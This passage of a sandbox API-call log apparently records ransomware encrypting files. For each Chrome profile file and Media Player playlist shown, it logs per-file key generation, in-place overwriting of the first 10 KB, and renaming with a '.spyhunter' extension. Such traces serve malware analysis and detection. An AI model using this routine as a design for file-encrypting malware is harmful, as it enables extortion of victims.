hFile=0x154, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x248f4ec, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248f4ec*=0x0, lpOverlapped=0x0) returned 1 [0138.333] GetProcessHeap () returned 0x2c0000 [0138.333] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0138.333] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0138.333] WriteFile (in: hFile=0x154, lpBuffer=0x248f52c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f4ec, lpOverlapped=0x0 | out: lpBuffer=0x248f52c*, lpNumberOfBytesWritten=0x248f4ec*=0x4, lpOverlapped=0x0) returned 1 [0138.335] WriteFile (in: hFile=0x154, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f4ec, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x248f4ec*=0x30, lpOverlapped=0x0) returned 1 [0138.335] CloseHandle (hObject=0x154) returned 1 [0138.335] GetProcessHeap () returned 0x2c0000 [0138.335] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f07c68 [0138.335] wnsprintfW (in: pszDest=0x2f07c68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Safe Browsing Channel IDs-journal.spyhunter") returned 115 [0138.335] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Safe Browsing Channel IDs-journal" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\safe browsing channel ids-journal"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Safe Browsing Channel IDs-journal.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\safe browsing channel ids-journal.spyhunter")) returned 1 [0138.336] GetProcessHeap () returned 0x2c0000 [0138.336] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f07c68 | out: hHeap=0x2c0000) returned 1 [0138.336] GetProcessHeap () returned 0x2c0000 [0138.336] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0138.336] GetProcessHeap () returned 0x2c0000 [0138.336] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fbbe00 | out: hHeap=0x2c0000) returned 1 [0138.348] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f520 | out: pbBuffer=0x248f520) returned 1 [0138.348] GetProcessHeap () returned 0x2c0000 [0138.348] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0138.348] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248f518*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248f518*=0x30) returned 1 [0138.348] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Local State" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\local state"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0138.352] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Local State") returned 83 [0138.352] StrStrW (lpFirst="Local State", lpSrch=".txt") returned 0x0 [0138.352] GetProcessHeap () returned 0x2c0000 [0138.352] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0138.352] ReadFile (in: hFile=0x154, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f4dc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248f4dc*=0x2800, lpOverlapped=0x0) returned 1 [0138.382] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0138.382] WriteFile (in: hFile=0x154, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248f4dc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248f4dc*=0x2800, lpOverlapped=0x0) returned 1 [0138.382] GetProcessHeap () returned 0x2c0000 [0138.382] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0138.382] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0138.382] WriteFile (in: hFile=0x154, lpBuffer=0x248f51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f4dc, lpOverlapped=0x0 | out: lpBuffer=0x248f51c*, lpNumberOfBytesWritten=0x248f4dc*=0x4, lpOverlapped=0x0) returned 1 [0138.399] WriteFile (in: hFile=0x154, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f4dc, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x248f4dc*=0x30, lpOverlapped=0x0) returned 1 [0138.399] CloseHandle (hObject=0x154) returned 1 [0138.399] GetProcessHeap () returned 0x2c0000 [0138.399] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f07c68 [0138.399] wnsprintfW (in: pszDest=0x2f07c68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Local State.spyhunter") returned 93 [0138.399] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Local State" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\local state"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Local State.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\local state.spyhunter")) returned 1 [0138.400] GetProcessHeap () returned 0x2c0000 [0138.400] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f07c68 | out: hHeap=0x2c0000) returned 1 [0138.401] GetProcessHeap () returned 0x2c0000 [0138.401] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0138.401] GetProcessHeap () returned 0x2c0000 [0138.401] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c8d198 | out: hHeap=0x2c0000) returned 1 [0138.401] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f518 | out: pbBuffer=0x248f518) returned 1 [0138.401] GetProcessHeap () returned 0x2c0000 [0138.401] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0138.401] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248f510*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248f510*=0x30) returned 1 [0138.401] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\_crx_aohghmighlieiainnegkcijnfilokake\\Google Docs.ico.md5" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\web applications\\_crx_aohghmighlieiainnegkcijnfilokake\\google docs.ico.md5"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0138.402] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\_crx_aohghmighlieiainnegkcijnfilokake\\Google Docs.ico.md5") returned 154 [0138.407] StrStrW (lpFirst="Google Docs.ico.md5", lpSrch=".txt") returned 0x0 [0138.407] GetProcessHeap () returned 0x2c0000 [0138.407] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0138.407] ReadFile (in: hFile=0x154, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f4d4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248f4d4*=0x10, lpOverlapped=0x0) returned 1 [0138.408] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xfffffff0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0138.408] WriteFile (in: hFile=0x154, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x248f4d4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248f4d4*=0x10, lpOverlapped=0x0) returned 1 [0138.408] GetProcessHeap () returned 0x2c0000 [0138.408] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0138.409] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0138.409] WriteFile (in: hFile=0x154, lpBuffer=0x248f514*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f4d4, lpOverlapped=0x0 | out: lpBuffer=0x248f514*, lpNumberOfBytesWritten=0x248f4d4*=0x4, lpOverlapped=0x0) returned 1 [0138.409] WriteFile (in: hFile=0x154, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f4d4, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x248f4d4*=0x30, lpOverlapped=0x0) returned 1 [0138.409] CloseHandle (hObject=0x154) returned 1 [0138.409] GetProcessHeap () returned 0x2c0000 [0138.409] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f07c68 [0138.409] wnsprintfW (in: pszDest=0x2f07c68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\_crx_aohghmighlieiainnegkcijnfilokake\\Google Docs.ico.md5.spyhunter") returned 164 [0138.409] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\_crx_aohghmighlieiainnegkcijnfilokake\\Google Docs.ico.md5" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\web applications\\_crx_aohghmighlieiainnegkcijnfilokake\\google docs.ico.md5"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\_crx_aohghmighlieiainnegkcijnfilokake\\Google Docs.ico.md5.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\web applications\\_crx_aohghmighlieiainnegkcijnfilokake\\google docs.ico.md5.spyhunter")) returned 1 [0138.410] GetProcessHeap () returned 0x2c0000 [0138.410] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f07c68 | out: hHeap=0x2c0000) returned 1 [0138.410] GetProcessHeap () returned 0x2c0000 [0138.410] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0138.410] GetProcessHeap () returned 0x2c0000 [0138.410] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f22a90 | out: hHeap=0x2c0000) returned 1 [0138.410] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f518 | out: pbBuffer=0x248f518) returned 1 [0138.410] GetProcessHeap () returned 0x2c0000 [0138.410] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0138.410] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248f510*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248f510*=0x30) returned 1 [0138.410] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Visited Links" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\visited links"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0138.411] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Visited Links") returned 93 [0138.411] StrStrW (lpFirst="Visited Links", lpSrch=".txt") returned 0x0 [0138.411] GetProcessHeap () returned 0x2c0000 [0138.411] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0138.411] ReadFile (in: hFile=0x154, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f4d4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248f4d4*=0x2800, lpOverlapped=0x0) returned 1 [0138.453] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0138.453] WriteFile (in: hFile=0x154, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248f4d4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248f4d4*=0x2800, lpOverlapped=0x0) returned 1 [0138.453] GetProcessHeap () returned 0x2c0000 [0138.453] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0138.454] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0138.454] WriteFile (in: hFile=0x154, lpBuffer=0x248f514*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f4d4, lpOverlapped=0x0 | out: lpBuffer=0x248f514*, lpNumberOfBytesWritten=0x248f4d4*=0x4, lpOverlapped=0x0) returned 1 [0138.454] WriteFile (in: hFile=0x154, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f4d4, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x248f4d4*=0x30, lpOverlapped=0x0) returned 1 [0138.454] CloseHandle (hObject=0x154) returned 1 [0138.470] GetProcessHeap () returned 0x2c0000 [0138.470] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f07c68 [0138.470] wnsprintfW (in: pszDest=0x2f07c68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Visited Links.spyhunter") returned 103 [0138.471] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Visited Links" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\visited links"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Visited Links.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\visited links.spyhunter")) returned 1 [0138.471] GetProcessHeap () returned 0x2c0000 [0138.471] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f07c68 | out: hHeap=0x2c0000) returned 1 [0138.471] GetProcessHeap () returned 0x2c0000 [0138.471] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0138.472] GetProcessHeap () returned 0x2c0000 [0138.472] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f4b250 | out: hHeap=0x2c0000) returned 1 [0138.477] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f508 | out: pbBuffer=0x248f508) returned 1 [0138.477] GetProcessHeap () returned 0x2c0000 [0138.478] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0138.478] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248f500*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248f500*=0x30) returned 1 [0138.478] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\12_All_Video.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\12_all_video.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0138.481] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\12_All_Video.wpl") returned 117 [0138.481] StrStrW (lpFirst="12_All_Video.wpl", lpSrch=".txt") returned 0x0 [0138.481] GetProcessHeap () returned 0x2c0000 [0138.482] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0138.482] ReadFile (in: hFile=0x16c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f4c4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248f4c4*=0x437, lpOverlapped=0x0) returned 1 [0138.483] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xfffffbc9, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0138.483] WriteFile (in: hFile=0x16c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x437, lpNumberOfBytesWritten=0x248f4c4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248f4c4*=0x437, lpOverlapped=0x0) returned 1 [0138.484] GetProcessHeap () returned 0x2c0000 [0138.484] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0138.484] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0138.484] WriteFile (in: hFile=0x16c, lpBuffer=0x248f504*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f4c4, lpOverlapped=0x0 | out: lpBuffer=0x248f504*, lpNumberOfBytesWritten=0x248f4c4*=0x4, lpOverlapped=0x0) returned 1 [0138.484] WriteFile (in: hFile=0x16c, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f4c4, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x248f4c4*=0x30, lpOverlapped=0x0) returned 1 [0138.484] CloseHandle (hObject=0x16c) returned 1 [0138.484] GetProcessHeap () returned 0x2c0000 [0138.484] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f07c68 [0138.484] wnsprintfW (in: pszDest=0x2f07c68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\12_All_Video.wpl.spyhunter") returned 127 [0138.484] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\12_All_Video.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\12_all_video.wpl"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\12_All_Video.wpl.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\12_all_video.wpl.spyhunter")) returned 1 [0138.485] GetProcessHeap () returned 0x2c0000 [0138.485] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f07c68 | out: hHeap=0x2c0000) returned 1 [0138.485] GetProcessHeap () returned 0x2c0000 [0138.485] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0138.485] GetProcessHeap () returned 0x2c0000 [0138.485] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f47f70 | out: hHeap=0x2c0000) returned 1 [0138.485] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f500 | out: pbBuffer=0x248f500) returned 1 [0138.486] GetProcessHeap () returned 0x2c0000 [0138.486] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0138.486] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248f4f8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248f4f8*=0x30) returned 1 [0138.486] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\10_All_Music.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\10_all_music.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0138.487] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\10_All_Music.wpl") returned 117 [0138.487] StrStrW (lpFirst="10_All_Music.wpl", lpSrch=".txt") returned 0x0 [0138.487] GetProcessHeap () returned 0x2c0000 [0138.487] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0138.487] ReadFile (in: hFile=0x16c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f4bc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248f4bc*=0x427, lpOverlapped=0x0) returned 1 [0138.489] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xfffffbd9, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0138.489] WriteFile (in: hFile=0x16c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x427, lpNumberOfBytesWritten=0x248f4bc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248f4bc*=0x427, lpOverlapped=0x0) returned 1 [0138.489] GetProcessHeap () returned 0x2c0000 [0138.489] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0138.489] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0138.489] WriteFile (in: hFile=0x16c, lpBuffer=0x248f4fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f4bc, lpOverlapped=0x0 | out: lpBuffer=0x248f4fc*, lpNumberOfBytesWritten=0x248f4bc*=0x4, lpOverlapped=0x0) returned 1 [0138.489] WriteFile (in: hFile=0x16c, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f4bc, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x248f4bc*=0x30, lpOverlapped=0x0) returned 1 [0138.490] CloseHandle (hObject=0x16c) returned 1 [0138.490] GetProcessHeap () returned 0x2c0000 [0138.490] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f07c68 [0138.490] wnsprintfW (in: pszDest=0x2f07c68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\10_All_Music.wpl.spyhunter") returned 127 [0138.492] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\10_All_Music.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\10_all_music.wpl"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\10_All_Music.wpl.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\10_all_music.wpl.spyhunter")) returned 1 [0138.492] GetProcessHeap () returned 0x2c0000 [0138.492] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f07c68 | out: hHeap=0x2c0000) returned 1 [0138.492] GetProcessHeap () returned 0x2c0000 [0138.493] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0138.493] GetProcessHeap () returned 0x2c0000 [0138.493] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f47e38 | out: hHeap=0x2c0000) returned 1 [0138.493] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f500 | out: pbBuffer=0x248f500) returned 1 [0138.493] GetProcessHeap () returned 0x2c0000 [0138.493] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0138.493] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248f4f8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248f4f8*=0x30) returned 1 [0138.493] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\09_Music_played_the_most.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\09_music_played_the_most.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0138.493] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media 